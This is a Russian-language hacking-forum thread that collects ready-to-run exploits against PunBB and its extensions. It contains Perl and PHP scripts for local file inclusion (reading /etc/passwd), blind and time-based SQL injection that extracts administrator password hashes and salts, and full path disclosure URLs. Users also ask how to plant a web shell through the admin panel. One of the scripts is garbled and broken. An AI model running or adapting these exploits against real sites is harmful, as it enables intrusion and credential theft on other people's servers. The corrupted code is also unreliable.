ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.11.2008, 23:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
PHP код:
#!/usr/bin/perl
=about
PunBB (PunPortal 0.1) Local File Inclusion Exploit
--------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/download.php?id=1108
download cms http://punbb.org
register globals = 1
magic quotes gcp = 1
File (include/login.php)
1. <?php
2.
3. // Show login if not logged in
4. if($pun_user['is_guest'])
5. {
6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
7. {
8.
9. // Load the language files
10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
$pun_user['is_guest'] isn't declared
$pun_user['language'] isn't declared
include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
how to fix?use the latest version (2.0)
Usage: perl punbb.pl localhost/cms
=cut
use strict;
use warnings;
use IO::Socket;
my $html = undef;
my $site = $ARGV[0] or &help;
my @take = split /\//,$site;
my ($host,$path) = @take;
if($site =~ /http:\/\/(.+?)/i) {
print STDOUT "Invalid URL\n";
exit;
}
print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";
chomp(my $file = <STDIN>);
if(not defined($file)) {
print STDOUT "File Not Defined!\n";
exit;
}
my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
Timeout => 6,
) or die $!;
my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Connection: close\r\n\r\n";
$sock->send($data);
while(<$sock>) {
$html .= $_;
}
if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
print STDOUT "Exploit Failed!\n";
exit;
}
else {
my $name = int(rand(999)).'.txt';
open(FILE,">",$name);
print FILE $html;
close(FILE);
print STDOUT "Exploit Successfully!\n";
print STDOUT "$name saved!\n";
exit;
}
sub help {
print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
"by athos - staker[at]hotmail[dot]it\n".
"Usage: perl $0 [host/path]\n";
exit;
}
http://www.milw0rm.com/exploits/7168 (с) |
|
|
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit |
28.07.2009, 23:07
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;
my ($UserName,$PassWord,$ID) = @ARGV;
if(@ARGV < 3){
&usage();
exit();
}
my $Message = "";
my ($Hash,$Time,$Time_Start,$Time_End,$Response);
my($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
my $DefaultTime = request($Referrer);
sub Login(){
my $Login = $HTTP->post($Host.'login.php?action=in',
[
form_sent => '1',
redirect_url => 'forums.php',
req_username => $UserName,
req_password => $PassWord,
login => 'Login',
]) || die $!;
if($Login->content =~ /Logged in successfully./i){
return 1;
}else{
return 0;
}
}
if (Login() == 1){
$Message = " * Logged in as: ".$UserName;
}elsif (Login() == 0){
$Message = " * Login Failed.";
refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
sub Blind_SQL_Jnjection{
my ($dec,$hex) = @_;
return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
}
for(my $I=1; $I<=40; $I++){ #N Hash characters
for(my $J=0; $J<=15; $J++){ #0 -> F
my $Post = $HTTP->post($Host.'reputation.php?',[
form_sent => '1',
pid => '2',
poster => Blind_SQL_Jnjection($I,$chars[$J]),
method => '1',
req_message => 'http://www.warwolfz.com/',
submit => 'Submit',
]) || die $!;
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
if($Post->content =~ /(The reputation has been successfully changed)/i){
syswrite(STDOUT,chr($chars[$J]));
$Hash .= chr($chars[$J]);
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
last;
}
}
if($I == 1 && length $Hash < 1 && !$Hash){
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
if($I == 40){
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n ";
system("pause");
}
}
sub usage{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [username] [password] [id] *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
exit;
}
sub request{
$Referrer = $_[0];
$Method->content_type('application/x-www-form-urlencoded');
$Method->content($Referrer);
$Start = Time::HiRes::time();
$Response = $HTTP->request($Method);
$Response->is_success() or die "$Host : ", $Response->message,"\n";
$End = Time::HiRes::time();
$Time = $End - $Start;
return $Time;
}
sub refresh{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [username] [password] [id] *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
print $_[0] ."\n";
print " * Victime Site: " . $_[1] . "\n";
print " * Default Time: " . $_[2] . " seconds\n";
print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
print " * BruteForcing N Char Hash: " . $_[6] . "\n";
print " * SQL Time: " . $_[5] . " seconds\n";
print " * Hash: " . $_[4] . "\n";
}
#WaRWolFz Crew
# milw0rm.com [2009-07-28]
|
|
|
|
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit |
31.07.2009, 10:25
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
Код:
#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#register_globals = On
#magic_quotes_gpc = On
use LWP::UserAgent;
use HTTP::Cookies;
use strict;
my $EtcPasswd;
my $TransversalDirectory = "./../../../../"; #Transversal Directory
my $LFI = "etc/passwd"; #File Inject
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Referrer = "http://www.warwolfz.com/";
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
sub Local_File_Inclusion{
my ($Directory,$Command) = @_;
return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";
}
my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));
if ($Get->content =~ /No such file or directory in/i){
refresh($HostName, "Exploit Filed");
print " * Error extracting sensible data.\n";
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n\n";
}else{
$EtcPasswd = $Get->content;
open ( FILE , ">WaRWolFz.html" ) or die $!;
print FILE $EtcPasswd;
close ( FILE );
refresh($HostName, "File Saved");
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n\n";
system("pause");
}
sub usage{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
exit;
}
sub refresh{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
print " * Victime Site: " . $_[0] . "\n";
print " * Etc/Passwd: " . $_[1] . "\n";
}
#WaRWolFz
# milw0rm.com [2009-07-30]
|
|
|
|
13.11.2009, 15:16
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
Код:
f (isset($_GET['secure_str']))
{
if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
{
...
'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)
Злоупотребление preg_match 
Код:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$pre = 'pun_';
$benchmark = 200000000;
$timeout = 10;
echo "Plz Waiting...\nPassword:\n";
/**
* get pass
*/
$j = 1;
$pass = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //az letters
while (strlen($pass) < 40) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
echo "\nSalt:\n";
/**
* get salt
*/
$j = 1;
$salt = '';
$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));
while (strlen($salt) < 12) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$salt .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}
exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");
function send()
{
global $host, $path, $cmd;
$data = "GET ".$path."misc.php?item=1&secure_str=".$cmd." HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
|
|
|
|
21.09.2010, 15:49
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Welemir
Welemir said:
На 1.3.4 LFi/RFI/inj ни у кого не завалялось,или уже не пентестят ?
есть блайнд
================================================== ===============
PunBB 526
# function pun_pm_edit_message()
# {
# global $forum_db, $forum_user, $lang_pun_pm;
#
# $errors = array();
#
# // Verify input data
# $query = array(
# 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
# 'FROM' => 'pun_pm_messages m',
# 'JOINS' => array(
# array(
# 'LEFT JO IN' => 'users AS u',
# 'ON' => '(u.id = m.receiver_id)'
# ),
# ),
# 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
# );
#
# ($hook = get_hook('pun_pm_fn_ed it_message_pre_validate_query')) ? eval($hook) : null;
#
# $result = $forum_db->query_build($query) or error(__FILE__, __LINE_ _);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nell a query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Er rno: 1064).
usestrict;
usewarnings;
useLWP::UserAgent;
useHTTP::Cookies;
useHTTP::Request::Common;
useTime::HiRes;
useIO::Socket;
my($UserName,$PassWord,$ID) = @ARGV;
if (@ARGVnew(GET=>$Host);
my $Cookies= newHTTP::Cookies;
my $HTTP= newLWP::UserAgent(
agent=>'Mozilla/5.0',
max_redirect=>0,
cookie_jar=>$Cookies,
) or die $!;
my $Referrer="http://www.warwolfz.org/";
my $DefaultTime=request($Referrer);
sub request{
$Referrer=$_[0];
$Method->referrer($Referrer);
$Start=Time::HiRes::time();
$Response=$HTTP->request($Method);
$Response->is_success() or die"$Host: ",$Response->message,"\n";
$End=Time::HiRes::time();
$Time=$End-$Start;
return$Time;
}
sub Blind_SQL_Jnjection{
my($dec,$hex) = @_;
return"./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
sub Clear() {
my $launch= $^O eq'MSWin32'?'cls':'clear';
returnsystem($launch);
}
sub Login() {
if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
$Cookies->proxy(['http','ftp'],'http://'.$ARGV[4]) or die $!;
}
my $Get=$HTTP->get($Host.'login.php');
my $csrf_token="";
if ($Get->content=~ /type="hidden"name="csrf_token"value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
$csrf_token= $1;
}
my$Login=$HTTP->post($Host.'login.php',
[
form_sent => '1',
redirect_u rl =>$Host.'login.php',
csrf_token =>$csrf_token,
req_userna me =>$UserName,
req_passwo rd =>$PassWord,
save_pass => '1',
login => 'Login',
]) || die $!;
if ($Login->content=~ /Verrai trasferito automaticamente ad una nuov a pagina in 1 secondo/i) { #English Language: You should automatic ally be forwarded to a new page in 1 seco nd.
return 1;
} else {
return 0;
}
}
sub usage {
Clear();
{
print "\n[0-Day]PunBB F
$Time_Start= time();
my$Get1=$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
$Time_End= time();
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
if ($Time_End-$Time_Start> 6) {
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
if ($Time_End-$Time_Start> 6) {
syswrite(S TDOUT,chr($chars[$J]));
$Hash.= chr($chars[$J]);
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
last;
}
}
}
if ($I== 1 && length$Hash[COLOR="#DD0000"]
|
|
|
|
16.08.2011, 16:32
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
Код:
Code:
# Exploit Title: Punbb 1.3.4 Full Path Disclosure
# Date: 07/11/2010
# Author: SYSTEM_OVERIDE, OverSecurityCrew
# Software Link: http://punbb.informer.com/
# Vulnerability Type: Full Path Disclosure
# Version: 1.3.4
Злоумышленник может узнать ROOTPATH.
Уязвимые файлы:
Код:
Code:
/search.php /userlist.php moderate.php
Example:
Код:
Code:
http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
http://www.site.com/[path]/moderate.php?get_host[]=
|
|
|
|
25.10.2011, 14:55
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 0
Провел на форуме:
194
Репутация:
0
|
|
Подскажите, как зашеллить через админку (доступ в админку форму есть)
|
|
|
|
30.10.2011, 16:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
3807
Репутация:
0
|
|
Как узнать версию вообще можно?
|
|
|
|
31.10.2011, 11:41
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 0
Провел на форуме:
194
Репутация:
0
|
|
Сообщение от SergioBlog
SergioBlog said:
Как узнать версию вообще можно?
Войдете в админку - там четко написано какая версия.
Я вот вошел, не пойму чё дальше делать, как шел залить.
|
|
|
|
28.08.2012, 05:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Люди, подскажите сплоиты\баги PunBB 1.3
Или же следующих плагинов (папка extensions)
Сообщение от None
.dev/
.gitattributes
.gitignore
ajax_post_edit/
bbcode_smiles/
developer_helper/
fancy_video_tag/
hcs_forum_image/
hcs_image_uploader/
hcs_redirect_links/
hide/
index.html
jq_chat/
jquery/
nya_jquery_ui/
pun_admin_add_user/
pun_admin_clear_cache/
pun_antispam/
pun_attachment/
pun_bbcode/
pun_colored_usergroups/
pun_forum_news/
pun_jquery/
pun_karma/
pun_move_posts/
pun_pm/
pun_poll/
pun_repository/
pun_stop_bots/
pun_tags/
reputation/
Спасибо |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [underwater]](/avatars/avatar81148.jpg?1685180){kind=avatar}
Похожие темы
Линейный вид
